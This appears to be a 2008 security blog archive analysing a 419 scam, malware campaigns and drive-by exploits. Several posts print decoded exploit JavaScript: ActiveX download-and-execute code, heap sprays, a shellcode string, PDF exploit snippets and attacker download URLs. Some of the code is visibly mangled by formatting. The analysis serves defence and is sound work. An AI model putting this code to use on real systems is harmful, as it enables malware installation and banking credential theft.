Sunday, December 21, 2008

IMF 419 Scam

419 and other advance-fee fraud scams are a regular part of life in the email world. I like to dig through my spam boxes to see what nuggets come up. A recent email with the subject "ECONOMIC STORM" indicated the "IMF international monetary fund and the world bank have collaborated to tackle the global economic storm facing the world." I'm glad to see someone is working to fix the economic crisis.

The email is spoofed from Mr. Dominique Strauss-Kahn and originates from the CHINANET-GD registered IP The email requests that the reply go to


Received: by with SMTP id s1cs313745fgb;
Sat, 20 Dec 2008 10:36:07 -0800 (PST)
Received: by with SMTP id s1mr2802117wad.118.1229798166053;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received: from pfyq6 ([])
by with SMTP id k21si16564504waf.32.2008.;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received-SPF: neutral ( is neither permitted nor denied by best guess record for domain of client-ip=;
Authentication-Results:; spf=neutral ( is neither permitted nor denied by best guess record for domain of
Message-Id: <>
From: "Mr.Dominique Strauss-Kahn"
Content-Type: text/plain;
Date: Sun, 21 Dec 2008 02:36:04 +0800
X-Priority: 3

This is to inform you/your company that IMF international monetary fund and the
world bank have collaborated to tackle the global economic storm facing
the world.
These authority have set aside the sum of USD 10,000,000,000 ( Ten Billion
United State Dollars ) to finance individuals/companies around the globe
who have a reasonable project.
All applicant should send their full data and project details (project name,
project purpose,project cost) to the address given below to apply the
support for your project.

Reply to Mr. John Condo
Project Finance Section
IMF Office Beijing China
( )

Yours sincerely,
Mr.Dominique Strauss-Kahn
Managing Director, IMF

The email attempts to validate itself by including a hyperlink to the bio of Mr.Dominique Strauss-Kahn. The only problem is the link points to the bio of Mr. Rodrigo de Rato, from Spain, who was the former Managing Director from June 7, 2004 to October 31, 2007.

Even the scammers can't keep up over time. It's amazing to security practitioners that these scams work, but at the same time we've all been asked by someone about the legitimacy of a virus hoax, 419, lottery, or chain email. You wouldn't think it's that profitable, but every once in a while, the scammers hit a goldmine. For example, Bruce Schneier recently blogged about a woman who lost $400K in a 419 scam. All I can say is I'm looking forward to my slice of the $10 Billion. WoooHooo!!!

Friday, December 19, 2008 Exploit Analysis

The analysis of exploit code hosted at results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...

A request for returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.

<script>opdYzUDi=document.location.href;if(opdYzUDi.indexOf('http://')!=-1){eval('Tgwm\x61Tgwm\x7aTgwm…….truncated…….\x7bTgwm\x7dTgwm\x7d'.replace(/Tgwm/g, ''));}</script>

<script>ftXokBk6=document.location.href;if(ftXokBk6.indexOf('http://')!=-1){eval('qyT\x66qyT\x75qyT…….truncated…….\x7bqyT\x7dqyT\x7d'.replace(/qyT/g, ''));}</script>

<html><iframe src="hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf" widht="1" height="1"></iframe></html>

<script>hu7AMj=document.location.href;if(hu7AMj.indexOf('http://')!=-1){eval('MZnVp\x76MZnVp\x61MZnVp…….truncated…….\x28MZnVp\x29MZnVp\x3b'.replace(/MZnVp/g, ''));}</script>

The JavaScript replace() method is used to obfuscate the exploit code. The replace() method syntax is


A 'g' flag is used to perform a global search and an 'i' flag is used to perform a case-insensitive search.

Exploit Block 1
The first block of exploit code globally replaces the characters Tgwm with the empty string ''. The decoded section returns a string of escaped hexadecimal characters.


The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.

az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(i = 0; i <= az.length - 1; i++){ start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));}function start(sUrl, sPath) { var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try { var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); try { t.type = 1;'GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);q.send();; t.write(q.responseBody); t.savetofile(sPath,2); t.close();} catch(e) {}try { s.shellexecute(sPath); if(shellexecute=true) { var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));'G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random()); b.send(null); }} catch(e){}} catch(e){}}

Exploit Block 2

The second block of exploit code uses the same obfuscation technique decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().

function killErrors() { return true; } window.onerror = killErrors; var x; var obj;var myarr = new Array(); myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';setTimeout('window.location = "ldap://"', 5000);for (x in myarr){obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();var buf2 = myarr[x]; obj.Zoom = 0;obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot();}catch(e){}}

Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeting a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus, which provides desktop publishing for Linux/Unix. Scribus provides a step-by-step guide for beginning to enhance PDF with JavaScript. The creation date is 8-6-08.

13 0 obj

[filter FlateDecode has been applied to the JavaScript bitstream]

12 0 obj
14 0 obj
/Producer (Scribus PDF Library
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)

The tool Pdftk - the PDF Toolkit can be used to inflate the FlateDecode JavaScript. The tool syntax is:

pdftk input.pdf output output.pdf uncompress

The exploit shellcode payload is a GET request for hxxp://soft4youupdat(dot)org/counts/load.php?pdf=35f4a8d465e6e1edc05f3d8ab658c551.

function rvcfcd208495d565e()
var rvc4ca4238a0b9238 = new Array();

function rvc81e728d9d4c2f6(rveccbc87e4b5ce2f, rva87ff679a2f3e71)
while (rveccbc87e4b5ce2f.length * 2 < rveccbc87e4b5ce2f =" rveccbc87e4b5ce2f.substring(0," rv1679091c5a880fa =" 0x0c0c0c0c;" rv8f14e45fceea167 =" unescape(" rvc9f0f895fb98ab9 =" 0x400000;" rv45c48cce2e2d7fb =" rv8f14e45fceea167.length" rva87ff679a2f3e71 =" rvc9f0f895fb98ab9" rveccbc87e4b5ce2f =" unescape(" rveccbc87e4b5ce2f =" rvc81e728d9d4c2f6(rveccbc87e4b5ce2f," rvd3d9446802a4425 =" (rv1679091c5a880fa" rv6512bd43d9caa6e =" 0;" rvc51ce410c124a10 =" app.viewerVersion.toString();" rvc51ce410c124a10 =" rvc51ce410c124a10.replace(/\D/g," rvaab3238922bcc25 =" new" rv9bf31c7ff062936 =" unescape(" collabstore =" Collab.collectEmailInfo({subj:">

Exploit Block 4
The fourth block of exploit code uses the same obfuscation technique decoding to reveal 3 buffer overflow exploits:

• COM Object Instantiation Memory Corruption Vulnerability (CVE-2005-2127, MS05-052)
• Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018
• Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability (MS08-070)

The shellcode payload for all 3 exploits is hxxp://soft4youupdat(dot)org/counts/load.php?bof=3c59dc048e8850243be8079a5c74d079.

var Shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u732F%u666F%u3474%u6F79%u7575%u6470%u7461%u6F2E%u6772%u632F%u756F%u746E%u2F73%u6F6C%u6461%u702E%u7068%u623F%u666F%u333D%u3563%u6439%u3063%u3834%u3865%u3538%u3230%u3334%u6562%u3038%u3937%u3561%u3763%u6434%u3730%u0039");function geSpyrrSlirrdep(sssprassydddbSliiide, saruuysaddize){while (sssprassydddbSliiide.length * 2 < sssprassydddbsliiide =" sssprassydddbSliiide.substring(0," hpsdyytttscess =" 0x0c0c0c0c;var" hadttdtsize =" 0x400000;var" payfdlytyusade =" Shellcode.length" tggter =" payfdLytyusade" saruuysaddize =" hadttdtSize" sssprassydddbsliiide =" unescape(" prrerat =" new" sssprassydddbsliiide =" geSpyrrSlirrdep(sssprassydddbSliiide," kilrrer =" hpsdyytttscess" hsttiicks =" kilrrer" i =" 0;" ugric =" 
unescape(" xyz =" 0x40000;while(ugric.length" ugric =" ugric.substring(0," bublic =" new" i =" bublic;">');zorro = Math.ceil(0xd0d0d0d);zorro = document.scripts[0].createControlRange().length;}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement("object");mmed.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");var mms="";for(var i=0; i < body =" '';var buf1 = '';for (i = 1; i <= 1945; i++){buf1 = buf1 + unescape(" href="">

Malware Analysis
The payload for all of the soft4youupdat(dot)org exploits is the same binary file.

Filename: bin_default.exe/default.exe
MD5: d9b7bf5b02fa9d1fc9da041916ff0a5e
Size: 59,392 bytes

The malware is a Zbot trojan which steals online banking information and downloads additional malware.

The following files are created:

308,736 bytes


The following registry key is created to launch the malware at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] Userinit = "%System%\userinit.exe,%System%\ntos.exe,"

VirusTotal indicates a low detection rate for this particular variant at the time of analysis [Result: 9/38 (23.68%)].

Domain Analysis
The domain was registered 11-20-08 at Everyones Internet, Ltd.

Domain ID:D154732571-LROR Domain

Created On:20-Nov-2008 12:59:45 UTC
Last Updated On:20-Nov-2008 13:19:16 UTC
Expiration Date:20-Nov-2009 12:59:45 UTC
Sponsoring Registrar:Everyones Internet, Ltd. (R1381-LROR)
Registrant ID:tul8MyjB2Dv7rqIF
Registrant Name:Vladimir Mashkov
Registrant Organization:N/A
Registrant Street1:st. Lenin's 56 square 43
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:10010
Registrant Country:RU
Registrant Phone:+7.4950784576
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

The domain currently resolves to which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351,

aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
mnt-by: MAINT-AS36351
changed: 20060110
source: RADB

SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp which is an international communications company headquartered in London, UK.

Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1) -

SOFTLAYER Technologies Inc is listed by in their top 10 worst network block owners and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both Innovation IT Solutions Corp and SOFTLAYER Technologies Inc have been previously tied to RBN activity and the Russian Cyberwar on Georgia.

Wednesday, November 12, 2008

Haxdoor ecard

On 11 November 2008, I received an email indicating that I had received an ecard.

Date: Tue, 11 Nov 2008 19:29:36 +0000
From: "" (spoofed)
To: "my love" <>
Subject: You have received an eCard

Good day.
You have received an eCard

To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):


Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!

We hope you enjoy you eCard.

Thank You!


The email included a hyperlink for hxxp:// The file ecard.exe is a variant of the Haxdoor malcode family. The domain is currently registered and hosted in the US (

34,440 bytes

The malware ecard.exe creates the following files:


20,108 bytes

7,072 bytes

Both Haxdoor files install as rootkits, hiding themselves from the Windows API.

>SSDT State
Actual Address 0xF8B0CFE9
Hooked by: C:\WINDOWS\system32\vbagz.sys

Actual Address 0xF8B0CA86
Hooked by: C:\WINDOWS\system32\vbagz.sys

Actual Address 0xF8B0C467
Hooked by: C:\WINDOWS\system32\vbagz.sys

Actual Address 0xF8B0C799
Hooked by: C:\WINDOWS\system32\vbagz.sys

Actual Address 0xF8B0C7EF
Hooked by: C:\WINDOWS\system32\vbagz.sys

Suspect File: C:\WINDOWS\system32\gzipmod.dll Status: Hidden
Suspect File: C:\WINDOWS\system32\vbagz.sys Status: Hidden
ntoskrnl.exe-->IoCreateFile, Type: Inline - RelativeJump at address 0x80583218 hook handler located in [vbagz.sys]
ntoskrnl.exe-->IoGetCurrentProcess, Type: Inline - RelativeJump at address 0x804EDE00 hook handler located in [vbagz.sys]

[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1724]svchost.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump at address 0x77F55669 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpOpenRequestA, Type: Inline - RelativeJump at address 0x76206C0A hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [gzipmod.dll]
[1724]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetConnectA, Type: Inline - RelativeJump at address 0x76205DE6 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetOpenA, Type: Inline - RelativeJump at address 0x7621017D hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]

The malware gzipmod.dll creates:

C:\WINDOWS\System32\ answxt.bin

K86.bin stores keylogger data. The following log shows examples of logon attempts at USBank and Wachovia.

00000159 00000159 0 ==================Google - Microsoft Internet Explorer ; MOD:C:\Program Files\Internet Explorer\iexplore.exe
000001C7 000001C7 0 usbank Enter 123456671988wachovia Enter 1234567 Tab pass123usbank Enter 12121212pass123456

The following registry keys are created to load gzipmod.dll at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache
Persistent = 0x00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gzipmod
DllName = "gzipmod.dll"
Startup = "gzipmod"
Impersonate = 0x00000001
Asynchronous = 0x00000001
MaxWait = 0x00000001
adr9i = "[6B1ADFD9D971359EA]"

The following registry keys are created to load vbagz.sys during a safe-mode boot:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver

The following registry entries are set, affecting internet security:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\System32\rundll32.exe"
Type: REG_SZ
Data: C:\WINDOWS\System32\rundll32.exe:*:Enabled:rundll32

The following registry entries install vbagz.sys as a service named “VBA2 PnP Driver”.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "DisplayName"
Type: REG_SZ
Data: VBA2 PnP Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ErrorControl"
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ImagePath"
Data: system32\vbagz.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Start"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Type"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_VBAGZ\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "Count"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "NextInstance"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Security "Security"
Data: [hexadecimal values]

The malware connects to The domain is registered and hosted in Russia (, SINGER-NET). The request returns instructions to download hxxp:// The domain is also registered and hosted in Russia (, SINGER-NET). The 11-11.bin file is saved as C:\WINDOWS\System32\tremir.bin. The bin file stores instructions for creating fake banking institution logon HTML pages and keylogger triggers.

GET /ie-bolt2/data.php?trackid=[string] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 12 Nov 2008 03:52:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.6

CMND UU0 U4hxxp:// ED |END

GET /inj/11-11.bin HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)

Keylogger output and other harvested data are exfiltrated to

POST /ie-bolt2/data.php?dt=0&id=4569 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.11731-201935)
Content-Length: 725
Content-Type: multipart/form-data; boundary=---------------------------
Connection: Keep-Alive
Pragma: no-cache
Content-Disposition: form-data; name="user" [string]
Content-Disposition: form-data; name="info"

CVE-2008-2992 Adobe PDF Exploitation

On 7 November 2008, SANS reported an active exploit against the Adobe Reader and Acrobat util.printf() JavaScript function stack buffer overflow vulnerability (CVE-2008-2992). Adobe Reader and Acrobat contain a stack buffer overflow in the util.printf() JavaScript function, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. The vulnerability was first reported by Core Security Technologies in May 2008. Adobe released Adobe Reader and Adobe Acrobat 8.1.3 on 4 November 2008 to address the vulnerability (APSB08-19). Public exploit code was reported on 7 November 2008. The following analyzes a malicious PDF sample.

Exploit Analysis:

The site hosted the malicious PDF file data.pdf (hxxp:// The domain is controlled by five name servers at Dynamic DNS (DDNS) allows individuals to create a hostname that points to their dynamic IP or static IP address or URL. DynDNS also provides an update mechanism which makes the hostname work with a dynamic IP address.

At the time of exploit, resolved to located in the Netherlands.

inetnum: -
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
remarks: Please send email to mailto:"" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
mnt-by: OCOM-MNT
source: RIPE # Filtered

The IP currently maps to 19 domains.



The malicious PDF file includes objects that contain document-level JavaScript.

00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj

The inflated PDF FlateDecode streams reveal obfuscated JavaScript which further decodes to reveal shellcode.

var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937

var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < fblk =" bgbl.substring(0,slspc);" blk =" bgbl.substring(0,bgbl.length" blk =" blk" mmy =" new" i =" 0;" nm =" 12;" i =" 0;" nm =" nm" i =" 0;" nm =" nm">

The shellcode execution results in a GET request for hxxp:// The domain is hosted at (same IP as

The request returns obfuscated JavaScript. The image reference for hxxp:// is for tracking purposes.

The decoded script reveals a redirect to

var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }

if(xobj) {"GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun");
response = xobj.responseText;

if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";

The request returns content for additional binary downloads.

GET /code/srun.php?req HTTP/1.1
request: srun

Six minutes later, a GET request for occurred. Additional hex-encoded binaries were downloaded over an 8 minute period. Notice the user-agent (WinHttp.WinHttpRequest.5) and Request value: srun.

GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)


The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.

GET /code/const.php HTTP/1.1

The downloaded malware installs a variety of crapware (rogue security products, adware, etc.).

Filename MD5 Size (Bytes)
data.pdf 84bc91579cd4dbee7faf3ee09c4a9a4b 10179
prun.exe d7512e025c439d8454a742992229770c 34816
rasesnet.exe 423d4daf5374710d4498ed917f44b92a 135168
searsnet.exe 18bd892d291f21f14e660537112bb81c 65024
snapsnet.exe 637146739c0dc4c078e0654e6d77eda1 112378
wavvsnet.exe 602b54e018fe9b226ebf8fd5ebaff09c 40014
winvsnet.exe 279ce5af3638a2ba1fde073bbe73a0c5 54784
xpre.exe 1d032fbc6d6884903fa92889f99fc180 745472

Gold VIP Club Casino

On 9 November 2008, a university web page hosted obfuscated JavaScript that, when decoded, revealed an iframe to hxxp:// ( The following analysis tracks the redirect results.

<div style="visibility:hidden"><iframe src="hxxp://" width=100 height=80></iframe></div>

The hxxp:// request returned an HTTP 302 redirect to hxxp://

The hxxp:// request returned an HTTP 302 redirect to hxxp://

The hxxp:// request returned advertising content for a Gold Casino promotion.

“Download” and “Play Now!” buttons download hxxp://

<a href="SmartDownload.exe"><img src="images/download.gif" width="271" height="83" alt="" border="0"></a>

<a href="SmartDownload.exe"><img src="images/playnow.gif" width="96" height="124" alt="" border="0"></a&gt;

Domain Analysis: is registered in RU and is registered to NOC4Hosts Inc., US.

Several other malicious domains resolved to at the time of analysis. is registered in RU and is registered in China.

SmartDownload.exe Analysis:

466,752 bytes

Upon execution SmartDownload.exe creates the C:\Program Files\Gold VIP Club Casino directory and opens an installer window.

SmartDownload.exe connects to ( on TCP port 20000 to receive C2. The client sends the string “Gold VIP Club Casino” and receives the string “”. A second connection returns the string hxxp:// The client connects to which uses Akamai caching to download the installation files package_list.ini.crc and

GET /cdn/goldvipclub/package_list.ini.crc HTTP/1.1 Host:
GET /cdn/goldvipclub/ HTTP/1.1 Host:

The domain is registered to RealTime Gaming Holding Company, LLC (Costa Rica).

Reverse lookups for rotate through several casino themed domains.

The following major files are created.

c:\Program Files\Gold VIP Club Casino\casino.dll
745,472 bytes

c:\Program Files\Gold VIP Club Casino\casino.exe
30,720 bytes

The following major registry keys are added to launch Gold VIP Club Casino at startup.

HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816} "(Default)"
Type: REG_SZ
Data: Gold Vip Club Casino
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\LocalServer32 "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\ProgID "(Default)"
Type: REG_SZ
Data: rtg.goldvipclub
HKEY_CLASSES_ROOT\rtg.goldvipclub "(Default)"
Type: REG_SZ
Data: URL: Realtime Gaming Protocol
HKEY_CLASSES_ROOT\rtg.goldvipclub "URL Protocol"
Type: REG_SZ
HKEY_CLASSES_ROOT\rtg.goldvipclub\CLSID "(Default)"
Type: REG_SZ
Data: {0CBAA404-8C7F-4070-8E42-8847E2394816}
HKEY_CLASSES_ROOT\rtg.goldvipclub\DefaultIcon "(Default)"
Type: REG_SZ
Data: casino.exe
HKEY_CLASSES_ROOT\rtg.goldvipclub\shell\open\command "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gold VIP Club Casino "DisplayName"
Type: REG_SZ
Data: Gold VIP Club Casino

The launching of Gold VIP Club Casino initiates a connection to TCP port 22053. The casino game requires an account to be created and personal information provided. Not sure how much I would trust a game that was installed through obfuscated JavaScript, a series of redirects and deceptive advertising :)

Sunday, November 9, 2008

Presidential Malspam

On 05 November 2008, Barack Obama-themed emails began circulating that contained hyperlinks to a fake news site that offered a video of Obama’s historic win. The site attempted to fool visitors into installing an Adobe Flash update, adobe_flash.exe. The executable download installs an Infostealer trojan designed to steal personal information. Sophos and McAfee provided updates on the threat.

Sample email verbiage included the following:

"From: "President election results"
